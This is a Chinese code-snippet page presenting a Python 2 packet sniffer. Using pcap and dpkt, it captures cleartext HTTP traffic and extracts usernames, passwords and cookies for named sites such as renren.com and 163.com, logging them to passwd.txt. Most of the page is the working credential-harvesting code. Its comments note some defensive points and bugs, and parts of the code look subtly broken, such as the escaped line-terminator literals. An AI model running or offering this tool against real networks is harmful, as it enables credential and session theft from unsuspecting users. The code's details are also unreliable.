Python 捕获web密码的程序,python捕获web密码,能够抓取POST的用户名


能够抓取 HTTP POST 请求中的用户名、密码,以及部分 GET 请求中的 Cookie。脚本的过滤器为 tcp dst port 80,因此只处理发往 80 端口的明文 HTTP 流量。

# -*- coding: utf8 -*-
#!/usr/bin/env python
#
# Passive HTTP capture script (Python 2 syntax: it uses the `print` statement).
# It reads frames from a network interface through pcap, decodes them with
# dpkt, and string-searches each TCP payload for a Host header, the GET/POST
# request line, a Cookie header and form fields named like login parameters.
# Matches are written to passwd.txt.
#
# Points a defender can take from the code as written:
#   * The capture filter is 'tcp dst port 80', so only cleartext HTTP requests
#     are examined; the script contains no TLS handling.
#   * Each packet is inspected on its own; there is no TCP stream reassembly.
#   * Output goes to the relative path passwd.txt, opened in 'w' mode (so it is
#     truncated on every start) -- a host-side artifact to look for.
import pcap
import dpkt
dev='eth0'
filter='tcp dst port 80'
pc=pcap.pcap(dev) # Note: the argument may be an interface name, e.g. eth0
pc.setfilter(filter)    # Install the capture filter
hostlist=['xiaonei.com', 'renren.com', '163.com', '126.com', 'cublog.cn', 'itlong.com']
# Never closed in the visible script; records are flushed one by one instead.
file=open('passwd.txt','w')
for ptime,pdata in pc:    # ptime is the receive time, pdata is the received data
    # Decode the frame as Ethernet and take the nested payloads as IP and TCP.
    # There is no error handling, so the script assumes every frame that
    # passes the filter has exactly this layering.
    ether=dpkt.ethernet.Ethernet(pdata)
    ip=ether.data
    tcp=ip.data
    # NOTE(review): content_len is not read again in the visible script, and
    # what the constant 8 stands for is not evident from here.
    content_len=len(tcp)-8
    # Per-packet result fields, reset on every iteration.
    host=''
    username=''
    password=''
    cookie=''
    geturl=''
    posturl=''
    username_pattern=''
    # NOTE(review): password_pattern is assigned but never used below; the
    # password marker is hard-coded as 'password='.
    password_pattern=''
    #Only Process POST Packet (disabled by the author)
#    if tcp.data.find('POST')==-1 or tcp.data.find('GET')==-1:
#        continue
    #Get Host
    # A packet is skipped unless both the 'Host: ' marker and the terminator
    # literal after it are found. The slice starts at the marker, so `host`
    # keeps the 'Host: ' prefix.
    host_start=tcp.data.find('Host: ')
    if host_start != -1:
        host_end=tcp.data.find('\\r\\n', host_start)
        if host_end != -1:
            host=tcp.data[host_start:host_end]
            #print host
        else:
            continue
    else:
        continue
    #Check host in hostlist
    # Prints every hostlist entry contained in `host`. The `continue` below only
    # advances this inner loop, so packets for hosts outside hostlist are NOT
    # skipped and still reach the logging step.
    for _host in hostlist:
        if host.find(_host)==-1:
            continue
        else:
            print _host
    #Get GET URL
    # Optional: geturl stays '' when the marker or the terminator is missing.
    geturl_start=tcp.data.find('GET ')
    if geturl_start!=-1:
        geturl_end=tcp.data.find('\\r\\n', geturl_start)
        if geturl_end!=-1:
            geturl=tcp.data[geturl_start:geturl_end]
            #print geturl
    #Pass picture
    # Substring test on the whole GET line, not on a file extension.
    if geturl.find('gif')!=-1 or geturl.find('png')!=-1 or geturl.find('jpg')!=-1:
        continue;
    #Get POST URL
    # Optional, same pattern as the GET line above.
    posturl_start=tcp.data.find('POST ')
    if posturl_start!=-1:
        posturl_end=tcp.data.find('\\r\\n', posturl_start)
        if posturl_end!=-1:
            posturl=tcp.data[posturl_start:posturl_end]
            #print posturl
    #Get Cookie
    # Optional; the slice keeps the 'Cookie: ' prefix.
    cookie_start=tcp.data.find('Cookie: ')
    if cookie_start!=-1:
        cookie_end=tcp.data.find('\\r\\n', cookie_start)
        if cookie_end != -1:
            cookie=tcp.data[cookie_start:cookie_end]
            #print cookie
    #Compute username_pattern
    # Pick the form-field name that marks the login identifier for the site
    # named in the Host line; anything unlisted falls back to 'username='.
    if host.find('xiaonei.com')!=-1 or host.find('renren.com')!=-1:
        username_pattern='email='
    elif host.find('lilacbbs.com')!=-1:
        username_pattern='userid='
    elif host.find('sso.itlong.com')!=-1:
        username_pattern='login_name='
    else:
        username_pattern='username='
    #Find UserName
    # The search covers the whole TCP payload, not only the request body.
    # If the marker is absent the code falls through with username == ''.
    username_start=tcp.data.find(username_pattern)
    if username_start!=-1:
        username_end=tcp.data.find('&', username_start)
        if username_end!=-1:
            username=tcp.data[username_start:username_end]
            #print username
        else:
            # Marker found but no '&' after it: skip the packet.
            continue
        #Find Password
        # Only attempted when a username was extracted. A missing 'password='
        # marker skips the packet; a marker with no '&' after it leaves
        # password == ''.
        password_start=tcp.data.find('password=')
        if password_start!=-1:
            password_end=tcp.data.find('&', password_start)
            if password_end!=-1:
                password=tcp.data[password_start:password_end]
                #print password
        else:
            continue
    #Log to file
    # Two record shapes: host + POST line + username + password when all four
    # are non-empty, otherwise host + GET line + cookie when those three are.
    # Each record is flushed immediately.
    if host and posturl and username and password:
        file.write('-----------------------\\n')
        file.write(host+'\\n')
        file.write(posturl+'\\n')
        file.write(username+'\\n')
        file.write(password+'\\n')
        file.flush()
    elif host and geturl and cookie:
        file.write('-----------------------\\n')
        file.write(host+'\\n')
        file.write(geturl+'\\n')
        file.write(cookie+'\\n')
        file.flush()
# This snippet comes from http://byrx.net
